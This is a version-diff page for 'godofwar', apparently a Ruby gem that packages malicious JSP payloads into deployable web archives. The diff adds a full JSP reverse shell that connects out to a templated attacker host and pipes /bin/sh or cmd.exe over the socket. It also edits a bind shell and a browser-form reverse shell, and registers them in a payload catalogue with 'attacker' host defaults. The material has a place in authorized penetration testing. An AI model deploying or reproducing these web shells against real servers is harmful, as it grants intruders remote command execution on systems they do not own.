godofwar 0.1.1 → 1.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (9) hide show
  1. checksums.yaml +4 -4
  2. data/lib/godofwar/builder.rb +1 -1
  3. data/lib/godofwar/extensions.rb +21 -21
  4. data/lib/godofwar/version.rb +1 -1
  5. data/payloads/bind_shell/bind_shell.jsp +6 -6
  6. data/payloads/payloads_info.json +9 -2
  7. data/payloads/reverse_shell/reverse_shell.jsp +58 -0
  8. data/payloads/reverse_shell_ui/reverse_shell_ui.jsp +15 -8
  9. metadata +2 -1
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: cad770ac51b330105ebdebed6020e46fe9389e1a5b7585921b7541c34178b0b0
4
- data.tar.gz: 99bd5b547ce8c0f1cd9c3363aa503d3243f32e6d94ae15933163f35b07b71bee
3
+ metadata.gz: 02a2315d93cc609cc8995e7c53ed79e27eb19786371d99b6604b212e4c2a5d53
4
+ data.tar.gz: feb713a3b750d8703371a5bacf60a525d5c16d3fe225247e5015fd14e6f8c464
5
5
  SHA512:
6
- metadata.gz: 9fac4faf7bf2cbd79f2498c858a288e8548aac1d01e14d5fee6b799c5930216baabe4e2d96ca6aaa1d58cc6a230d29635ae8964b399f4c3c8247f552f07df53c
7
- data.tar.gz: 13dc0ed6aadb81cafe8c211e288f312339bc164a5ffafbf716a6d1a9da83ec57550f3c256153b1390a2a739684927a304c2c23ff6ad06590f40d5964c5244b6b
6
+ metadata.gz: 35891b78552023889a009222df08c8712a99516c2c72581722d8d1e1add71f5e6a45e2cf777afd102e8c05cbe291af13b30b7c2a8591ecf8f8833dc4267258a2
7
+ data.tar.gz: 65fd0d1a175fb71a253c600b68db5a6877275bd733e72ac2931b31c7aa04039e98bec79032183c5e54437d9b550fc29b6520a034e2bf6ad49c9a46827e9cec1c
data/lib/godofwar/builder.rb CHANGED
@@ -88,7 +88,7 @@ module GodOfWar
88
88
  payload_raw = File.read(payload_file)
89
89
  else
90
90
  host = host.nil? ? @payload.conf["host"] : host
91
- port = port.nil? ? @payload.conf["host"] : port
91
+ port = port.nil? ? @payload.conf["port"] : port
92
92
  payload_raw = File.read(payload_file)
93
93
  .sub('HOSTHOST', "#{host}").sub('PORTPORT', "#{port}")
94
94
  end
data/lib/godofwar/extensions.rb CHANGED
@@ -2,27 +2,27 @@ module GodOfWar
2
2
  module Extensions
3
3
  module Core
4
4
  module String
5
- def red; colorize(self, "\e[1m\e[31m"); end
6
- def green; colorize(self, "\e[1m\e[32m"); end
7
- def dark_green; colorize(self, "\e[32m"); end
8
- def yellow; colorize(self, "\e[1m\e[33m"); end
9
- def blue; colorize(self, "\e[1m\e[34m"); end
10
- def dark_blue; colorize(self, "\e[34m"); end
11
- def purple; colorize(self, "\e[35m"); end
12
- def dark_purple; colorize(self, "\e[1;35m"); end
13
- def cyan; colorize(self, "\e[1;36m"); end
14
- def dark_cyan; colorize(self, "\e[36m"); end
15
- def pure; colorize(self, "\e[0m\e[28m"); end
16
- def underline; colorize(self, "\e[4m"); end
17
- def bold; colorize(self, "\e[1m"); end
18
- def tell; colorize(self, "[" + " ℹ " + "] "); end
19
- def error; colorize(self, "[" + " ✖ ".red + "] "); end
20
- def warn; colorize(self, "[" + " ! ".bold.yellow + "] "); end
21
- def success; colorize(self, "[" + " ✔ ".dark_green + "] "); end
22
- def step_success; colorize(self, " ✔ ".dark_green); end
23
- def step_fail; colorize(self, " ✖ ".dark_green); end
24
- def done; colorize(self, "[" + " ✔ ".green + "] "); end
25
- def colorize(text, color_code) "#{color_code}#{text}\e[0m" end
5
+ def red; colorize(self, "\e[1m\e[31m"); end
6
+ def green; colorize(self, "\e[1m\e[32m"); end
7
+ def dark_green; colorize(self, "\e[32m"); end
8
+ def yellow; colorize(self, "\e[1m\e[33m"); end
9
+ def blue; colorize(self, "\e[1m\e[34m"); end
10
+ def dark_blue; colorize(self, "\e[34m"); end
11
+ def purple; colorize(self, "\e[35m"); end
12
+ def dark_purple; colorize(self, "\e[1;35m"); end
13
+ def cyan; colorize(self, "\e[1;36m"); end
14
+ def dark_cyan; colorize(self, "\e[36m"); end
15
+ def pure; colorize(self, "\e[0m\e[28m"); end
16
+ def underline; colorize(self, "\e[4m"); end
17
+ def bold; colorize(self, "\e[1m"); end
18
+ def tell; colorize(self, "[" + " ℹ " + "] "); end
19
+ def error; colorize(self, "[" + " ✖ ".red + "] "); end
20
+ def warn; colorize(self, "[" + " ! ".bold.yellow + "] "); end
21
+ def success; colorize(self, "[" + " ✔ ".dark_green + "] "); end
22
+ def step_success; colorize(self, " ✔ ".dark_green); end
23
+ def step_fail; colorize(self, " ✖ ".dark_green); end
24
+ def done; colorize(self, "[" + " ✔ ".green + "] "); end
25
+ def colorize(text, color_code) "#{color_code}#{text}\e[0m" end
26
26
  end
27
27
  end
28
28
  end
data/lib/godofwar/version.rb CHANGED
@@ -1,3 +1,3 @@
1
1
  module GodOfWar
2
- VERSION = "0.1.1"
2
+ VERSION = "1.0.1"
3
3
  end
data/payloads/bind_shell/bind_shell.jsp CHANGED
@@ -44,13 +44,13 @@
44
44
  try
45
45
  {
46
46
  String ShellPath;
47
- if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
48
- ShellPath = new String("/bin/sh");
49
- } else {
50
- ShellPath = new String("cmd.exe");
51
- }
47
+ if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
48
+ ShellPath = new String("/bin/sh");
49
+ } else {
50
+ ShellPath = new String("cmd.exe");
51
+ }
52
52
 
53
- ServerSocket server_socket = new ServerSocket( "PORTPORT" );
53
+ ServerSocket server_socket = new ServerSocket( PORTPORT );
54
54
  Socket client_socket = server_socket.accept();
55
55
  server_socket.close();
56
56
  Process process = Runtime.getRuntime().exec( ShellPath );
data/payloads/payloads_info.json CHANGED
@@ -21,10 +21,17 @@
21
21
  "ref" : ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
22
22
  },
23
23
  "reverse_shell_ui": {
24
- "desc" : "TCP reverse shell with a UI to set LHOST and LPORT from browser.",
25
- "os" : "windows",
24
+ "desc" : "TCP reverse shell with a HTML form to set LHOST and LPORT from browser.",
25
+ "os" : "any",
26
26
  "conf" : {"host": "attacker", "port": 4444},
27
27
  "url" : "http://host/reverse_shell_ui.jsp",
28
28
  "ref" : []
29
+ },
30
+ "reverse_shell": {
31
+ "desc" : "TCP reverse shell. LHOST and LPORT are hardcoded",
32
+ "os" : "any",
33
+ "conf" : {"host": "attacker", "port": 4444},
34
+ "url" : "http://host/reverse_shell.jsp",
35
+ "ref" : []
29
36
  }
30
37
  }
data/payloads/reverse_shell/reverse_shell.jsp ADDED
@@ -0,0 +1,58 @@
1
+ <%@page import="java.lang.*"%>
2
+ <%@page import="java.util.*"%>
3
+ <%@page import="java.io.*"%>
4
+ <%@page import="java.net.*"%>
5
+
6
+ <%
7
+ class StreamConnector extends Thread
8
+ {
9
+ InputStream xr;
10
+ OutputStream zf;
11
+
12
+ StreamConnector( InputStream xr, OutputStream zf )
13
+ {
14
+ this.xr = xr;
15
+ this.zf = zf;
16
+ }
17
+
18
+ public void run()
19
+ {
20
+ BufferedReader ye = null;
21
+ BufferedWriter gfu = null;
22
+ try
23
+ {
24
+ ye = new BufferedReader( new InputStreamReader( this.xr ) );
25
+ gfu = new BufferedWriter( new OutputStreamWriter( this.zf ) );
26
+ char buffer[] = new char[8192];
27
+ int length;
28
+ while( ( length = ye.read( buffer, 0, buffer.length ) ) > 0 )
29
+ {
30
+ gfu.write( buffer, 0, length );
31
+ gfu.flush();
32
+ }
33
+ } catch( Exception e ){}
34
+ try
35
+ {
36
+ if( ye != null )
37
+ ye.close();
38
+ if( gfu != null )
39
+ gfu.close();
40
+ } catch( Exception e ){}
41
+ }
42
+ }
43
+
44
+ try
45
+ {
46
+ String ShellPath;
47
+ if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
48
+ ShellPath = new String("/bin/sh");
49
+ } else {
50
+ ShellPath = new String("cmd.exe");
51
+ }
52
+
53
+ Socket socket = new Socket( "HOSTHOST", PORTPORT );
54
+ Process process = Runtime.getRuntime().exec( ShellPath );
55
+ ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
56
+ ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
57
+ } catch( Exception e ) {}
58
+ %>
data/payloads/reverse_shell_ui/reverse_shell_ui.jsp CHANGED
@@ -4,8 +4,8 @@
4
4
  <%@page import="java.net.*"%>
5
5
 
6
6
  <form method="post">
7
- LHOST: <input type="text" name="ip" size=12 value="HOSTHOST"><br />
8
- LPORT: <input type="text" name="port" size=12 value="PORTPORT"><br />
7
+ LHOST: <input type="text" name="ip" size=12 placeholder="HOSTHOST"><br />
8
+ LPORT: <input type="text" name="port" size=12 placeholder="PORTPORT"><br />
9
9
  <input type="submit" name="Connect" value="Connect"><br />
10
10
  </form>
11
11
 
@@ -52,12 +52,19 @@ try
52
52
  }
53
53
  }
54
54
 
55
- try
56
- {
57
- Socket socket = new Socket( ipAddress,(new Integer(ipPort)).intValue());
58
- Process process = Runtime.getRuntime().exec( "cmd.exe" );
55
+ try
56
+ {
57
+ String ShellPath;
58
+ if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
59
+ ShellPath = new String("/bin/sh");
60
+ } else {
61
+ ShellPath = new String("cmd.exe");
62
+ }
63
+
64
+ Socket socket = new Socket( ipAddress,(new Integer(ipPort)).intValue());
65
+ Process process = Runtime.getRuntime().exec( ShellPath );
59
66
  ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
60
67
  ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
61
- } catch( Exception e ) {}
68
+ } catch( Exception e ) {}
62
69
  }
63
- %>
70
+ %>
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: godofwar
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.1
4
+ version: 1.0.1
5
5
  platform: ruby
6
6
  authors:
7
7
  - KINGSABRI
@@ -50,6 +50,7 @@ files:
50
50
  - payloads/filebrowser/example-css.css
51
51
  - payloads/filebrowser/filebrowser.jsp
52
52
  - payloads/payloads_info.json
53
+ - payloads/reverse_shell/reverse_shell.jsp
53
54
  - payloads/reverse_shell_ui/reverse_shell_ui.jsp
54
55
  homepage: https://github.com/KINGSABRI/godofwar
55
56
  licenses: